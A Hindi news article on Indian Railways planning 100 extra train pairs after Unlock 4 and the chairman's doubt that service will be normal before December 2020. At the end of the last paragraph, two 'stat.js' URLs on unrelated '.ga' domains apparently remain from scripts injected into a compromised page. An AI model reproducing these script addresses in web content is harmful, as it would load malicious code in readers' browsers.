अनलॉक 4 होने के बाद रेलवे प्रशासन ने एक-एक करके रेलवे यात्रियों को राहत की खबर देता जा रहा है। भारतीय रेलवे ने आगामी त्योहारी सीजन शुरू होने से पहले 100 जोड़ी अतिरिक्त ट्रेनों को चलाने की तैयारी में लग गई है कितनी ट्रेनें चलाई जाने के बावजूद भी भारतीय रेलवे ट्रेन सेवाओं का पूरी तरह से बहाल नहीं कर पा रहा है।

 

 

साल के आखिर तक भी पूरी ट्रेनों का संचालन किया जाना संभव नहीं है।साल 2021 तक में कुल 13500 ट्रेनों को हरी झंडी दिखाने की संभावना है। खबरों के मुताबिक जिन राज्यों में कोरोना का प्रकोप लगातार बढ़ रहा है। वहां से होकर ट्रेनों को गुजरने की भी पूरी छूट है| नयी व्यवस्था के तहत घाटे वाले रूटों पर राजनितिक दबाव में रेलवे ट्रेनों का परिचालन नहीं करेगा। वैसे रुट जहाँ 10 से 15 दिनों की वेटिंग रहेगी वैसे रूटों पर अलग से ट्रेन या क्लोन ट्रेन चलाई जाएगी।

 

रेलवे बोर्ड के चेयरमैन विनोद कुमार यादव ने दैनिक जागरण से बताया कि फिलहाल जितनी स्पेशल ट्रेनें चल रहीं हैं उनमें भी कुछ रूटों पर यात्रियों की संख्या संतोषजनक नहीं है। देश में सात ऐसे राज्य हैं, जहां कोरोना का संक्रमण लगातार बढ़ रहा है। महाराष्ट्र, पश्चिम बंगाल, आंध्र प्रदेश, दिल्ली, पंजाब, तमिलनाडु और नार्थ ईस्टर्न के राज्य प्रमुख हैं, जिनमें कोरोना संक्रमण काबू में नहीं होने की वजह से वहां ट्रेनों का संचालन सामान्य करने में दिक्कत पेश आ रही है। यादव ने एक सवाल के जवाब में बताया कि दिसंबर 2020 तक ट्रेनों के संचालन के सामान्य होने पर संदेह है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.